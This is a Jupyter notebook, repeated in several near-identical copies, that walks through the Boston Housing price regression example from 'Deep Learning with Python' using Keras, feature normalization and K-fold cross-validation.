Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
('processing fold #', 0)
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
#train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
import numpy as np
# save np.load
np_load_old = np.load
# modify the default parameters of np.load
np.load = lambda *a,**k: np_load_old(*a, allow_pickle=True, **k)
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
# restore np.load for future normal usage
np.load = np_load_old
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
